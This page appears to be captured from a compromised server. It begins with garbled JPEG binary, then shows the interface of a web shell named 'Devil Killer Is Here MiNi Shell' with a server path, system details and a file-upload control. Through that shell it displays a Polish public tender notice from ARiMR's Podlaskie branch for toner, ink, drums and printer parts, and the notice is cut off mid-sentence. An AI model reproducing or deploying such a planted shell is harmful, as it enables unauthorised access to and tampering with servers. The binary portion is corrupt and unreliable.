JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220929/0037028701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawę tonerów, tuszy, bębnów światłoczułych i części do urządzeń biurowych eksploatowanych w Podlaskim Oddziale Regionalnym ARiMR </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ARiMR Agencja Restrukturyzacji i Modernizacji Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Podlaski Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010613083</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48862156311</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48862164513</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">podlaski@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wspieranie rozwoju rolnictwa i obszarów wiejskich w roli akredytowanej agencji płatniczej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawę tonerów, tuszy, bębnów światłoczułych i części do urządzeń biurowych eksploatowanych w Podlaskim Oddziale Regionalnym ARiMR </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-49143369-3f1f-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00370287</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu<br/>odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy Zakupowej, zwanej dalej „Platformą Zakupową” dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/arimr, gdzie należy wybrać zakładkę „postępowania”, a następnie przejść na formularz<br/>niniejszego postępowania.<br/>2. Złożenie oferty wraz z Załącznikami odbywa się poprzez formularz składania ofert znajdujący się na Platformie Zakupowej (po<br/>przejściu do strony niniejszego postępowania z sekcji „Formularz”).<br/>3. Za datę przekazania (wpływu oświadczeń, dokumentów, wniosków, zawiadomień oraz informacji) przyjmuje się datę ich przesłania<br/>za pośrednictwem Platformy Zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>1) złożenie oferty możliwe jest przez Wykonawców, którzy posiadają konto na Platformie Zakupowej oraz przez Wykonawców<br/>nieposiadających konta na Platformie Zakupowej. W celu założenia konta na Platformie Zakupowej należy wybrać zakładkę „Zaloguj<br/>się” w kolejnym kroku należy wybrać „Załóż konto”, następnie należy wypełnić formularze i postępować zgodnie z poleceniami<br/>wyświetlającymi się ekranie monitora. W przypadku Wykonawców niezalogowanych w celu złożenia oferty niezbędne jest podanie<br/>adresu e-mail (na który wysyłane będzie potwierdzenie złożenia oferty), numeru NIP oraz nazwy firmy i nieobowiązkowo numeru<br/>telefonu,<br/>2) ofertę oraz oświadczenie, o którym mowa w art. 125 Ustawy, należy złożyć pod rygorem nieważności w formie elektronicznej<br/>podpisanej kwalifikowanym podpisem elektronicznym przez osoby upoważnione do tej czynności lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do tych czynności.<br/>3) Wykonawca składa ofertę, która w przypadku prawidłowego złożenia oferty zostaje automatycznie zaszyfrowana przez system.<br/>Nie jest możliwe zapoznanie się z treścią złożonej oferty przed upływem terminu otwarcia ofert,<br/>4) podpisywanie dokumentów w formie skompresowanej poprzez opatrzenie całego pliku jednym podpisem kwalifikowanym,<br/>podpisem zaufanym lub podpisem elektronicznym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym oraz z poświadczeniem za<br/>zgodność z oryginałem wszystkich elektronicznych kopii dokumentów. Dokumenty, co do których wymagana jest forma oryginału,<br/>muszą być podpisane indywidualnie (każdy z nich) kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>2. niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF.<br/>3. dopuszczalne formaty przesyłanych danych tj. plików wielkości do 150 MB. Zalecany format PDF.<br/>4. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z.<br/>5. informacje na temat kodowania i czasu odbioru danych, tj.:<br/>1) szyfrowanie na Platformie Zakupowej odbywa się za pomocą protokołu TLS 1.3,<br/>2) plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany nie jest widoczny dla Zamawiającego, gdyż jest w systemie<br/>zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez system, co następuje po terminie otwarcia<br/>ofert,<br/>3) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do oferty elektronicznej data oraz dokładny czas (hh:mm:ss),<br/>znajdujące się w kolumnie dotyczącej danej oferty w sekcji „Data złożenia oferty”.<br/>6. dopuszczalny format kwalifikowanego podpisu elektronicznego, podpisu zaufanego oraz podpisu osobistego, w przypadku:<br/>1) dokumentów sporządzonych w formacie PDF zaleca się podpisanie dokumentu w formacie PAdES,<br/>2) dokumentów sporządzonych w formacie innym niż PDF zaleca się podpisanie dokumentu w formacie XAdES.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Zamawiający odstępuje od wymagania użycia środków komunikacji elektronicznej w zakresie obowiązku dostarczenia próbek tonerów do urządzeń Lexmark MX611, Lexmark X654/T654 oraz Lexmark MS811 (poz. 1., 2. i 4. Formularza Ofertowego), które należy dostarczyć do siedziby Zamawiającego (na adres: 18-400 Łomża, ul. Nowa 2, pokój nr 109), w terminie składania ofert, wskazanym w rozdziale VII Specyfikacji, za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2022 r. poz. 896), osobiście lub za pośrednictwem posłańca.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna w zakresie przetwarzania danych osobowych została<br/>zamieszczona w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie przewiduje ograniczeń stosowania przepisów Rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 2016/679 - zgodnie z art. 19 ust. 4 Ustawy prawo zamówień publicznych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR10.2619.2.2022.AK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa tonerów, tuszy, bębnów światłoczułych i części do urządzeń biurowych eksploatowanych w Podlaskim Oddziale Regionalnym, przedstawionych w poniższej tabeli:<br/>Część I – Tonery, tusze, bębny światłoczułe<br/>L.p.	Producent urządzenia	Model urządzenia	Minimalna wydajność tonera, tuszu, bębna światłoczułego (liczba kopii)	Oznaczenie tonera, tuszu, bębna światłoczułego<br/>przez producenta*	Jednostka miary	Ilość<br/>1.	Lexmark	MX611	20000 według ISO/ICE 19752	602XE / 60F2X0E	szt.	80<br/>2.	Lexmark	X654/T654	36000 według ISO/ICE 19752	T654X31E / T654X11E	szt.	230<br/>3.	Samsung	ML-3710DN	10000 stron wg danych producenta	MLT-D205E/ MLT-D205L	szt.	44<br/>4.	Lexmark	MS811	45000 według ISO/ICE 19752	522XE / 52D20X00	szt.	90<br/>5.	Lexmark	MX611	Bęben światłoczuły 60K	50F0Z00	szt.	25<br/>6.	Lexmark	MX711/MS811	Bęben światłoczuły 100K	520Z / 52D0Z00	szt.	40<br/>7.	HP	OfficeJet 202	600 według normy ISO/IEC 24711	C2P10A HP651	szt.	15<br/>8.	HP	H470wbt	260 według normy ISO/IEC 24711	HP343	szt.	15<br/>9.	HP	H470wbt	400 według normy ISO/IEC 24711	HP337	szt.	30<br/>10.	HP	200	165 według normy ISO/IEC 24711	62 / C2P06AE Kolor	szt.	16<br/>11.	HP	200	600 według normy ISO/IEC 24711	62 XL / C2P05AE Czarny	szt.	24<br/>Część II – Części<br/>L.p.	Producent urządzenia	Model urządzenia	Opis	Oznaczenie części przez producenta*	Jednostka miary	Ilość<br/>1.	Kyocera	4501i	Maintenance	MK-6315	szt.	1<br/>2.	Lexmark	X654/T654	Rolka transferowa	40X1886	szt.	10<br/>3.	Lexmark	X654/T654	Osłona fusera T654 / X654	40X4417	szt.	5<br/>4.	Lexmark	MX711	Maintenance	40X8421	szt.	9<br/>5.	Lexmark	MX611	Maintenance	40X9138	szt.	3<br/>* – lub równoważne, w sytuacji, gdy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 - 3 Ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym, a wskazane powyżej odniesienia należy odczytywać z wyrazami „lub równoważne”<br/><br/>2.	Obowiązkiem Wykonawcy będzie również odbiór pustych pojemników po tonerach, tuszach i bębnach światłoczułych dwa razy w roku przez okres 36 miesięcy od dnia dostarczenia tonerów, tuszy i bębnów światłoczułych. Wykonawca zobowiązany będzie do odbioru pustych tonerów, tuszy i bębnów światłoczułych w ciągu 14 dni od dnia pisemnego wezwania Zamawiającego. Odbiór pustych pojemników po tonerach, tuszach i bębnach światłoczułych nastąpi na podstawie Karty przekazania odpadów wystawionej przez Zamawiającego w dniu odbioru. Wykonawca musi posiadać wpis do Bazy Danych Odpadowych umożliwiający realizację przedmiotu zamówienia w tym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30125110-5 - Toner do drukarek laserowych/faksów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30125120-8 - Toner do fotokopiarek</p> <p class="mb-0">30124300-7 - Bębny do maszyn biurowych</p> <p class="mb-0">22600000-6 - Tusz</p> <p class="mb-0">30124000-4 - Części i akcesoria do maszyn biurowych</p> <p class="mb-0">30124100-5 - Fusery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie oceniona jako najkorzystniejsza w oparciu o podane poniżej kryteria wyboru.<br/>2.	Łączna liczba punktów uzyskanych przez Wykonawcę zostanie wyliczona na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej, zgodnie ze wzorem:<br/>P = C + T<br/>gdzie:<br/>P – liczba punktów przyznana ofercie (liczona z dokładnością do dwóch miejsc po przecinku). Zasada zaokrąglania – poniżej 5 należy końcówkę pominąć, 5 i powyżej 5 należy zaokrąglić w górę.<br/>C – liczba punktów przyznanych ofercie w kryterium „cena oferty”,<br/>T – liczba punktów przyznanych ofercie w kryterium „termin realizacji zamówienia”<br/>3.	Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Ustawy, z zastrzeżeniem art. 110 ust. 2-3 Ustawy,<br/>2)	nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835)<br/>oraz<br/>3)	spełniają warunki udziału w postępowaniu na podstawie art. 116 Ustawy dotyczące zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub w przypadku świadczeń powtarzających się okresowo lub ciągłych nadal realizuje co najmniej 2 dostawy o wartości nie mniejszej niż 200 000,00 zł brutto, przy czym Wykonawca nadal realizujący dostawę, spełni warunek tylko wówczas jeżeli wykaże, że w ramach wykonywanej dostawy zrealizował ją już w takim zakresie jakiego wymaga Zamawiający (dotyczącym łącznej wartości) i że wykonał/wykonuje je należycie, potwierdzając ten fakt referencjami lub innymi dokumentami. W przypadku świadczeń powtarzających się okresowo lub ciągłych nadal wykonywanych referencje lub inne dokumenty powinny być wystawione w okresie ostatnich trzech miesięcy.<br/>UWAGA<br/>W odniesieniu do warunku wskazanego w rozdziale IX ust. 1 pkt 3) Specyfikacji, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają dostawy, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania, które dostawy wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji.<br/>2.	Wykonawca jest zobowiązany wykazać niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w postępowaniu.<br/>3.	Ocena spełniania w/w zostanie dokonana w oparciu o informacje zawarte w przedłożonych przez Wykonawcę oświadczeniach lub dokumentach wyszczególnionych w rozdziale VI Specyfikacji. Z treści załączonych dokumentów musi wynikać, że Wykonawca w/w warunki spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia, za pośrednictwem Platformy Zakupowej, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych i dokumentów - na potwierdzenie braku podstawy wykluczenia o której mowa w art. 108. ust. 1. pkt 5) Ustawy – oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r o ochronie konkurencji i konsumentów (tj. Dz. U. z 2021 r., poz. 275.), z innym wykonawcą, który złożył odrębną ofertę w niniejszym postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w niniejszym postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 6 do Specyfikacji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca obowiązany jest złożyć wraz z ofertą (Formularzem ofertowym – Załącznik nr 1 do Specyfikacji) następujące dokumenty:<br/>1)	aktualne na dzień składania ofert Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania (Załącznik nr 2 do Specyfikacji),<br/>2)	aktualne na dzień składania ofert Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik nr 3 do Specyfikacji),<br/>3)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania, które dostawy wykonają poszczególni Wykonawcy (członkowie konsorcjum) – (Załącznik nr 4 do Specyfikacji),<br/>4)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy w szczególności w zakresie podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestrowym,<br/>5)	Zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami, jeżeli Wykonawca powołuje się na zasoby innych podmiotów (Załącznik nr 7 do Specyfikacji).<br/><br/>2.	Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia, za pośrednictwem Platformy Zakupowej, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych i dokumentów na potwierdzenie spełnienia warunków udziału w postępowaniu dotyczącym zdolności technicznej lub zawodowej – wykazu wykonanych lub wykonywanych dostaw z podaniem 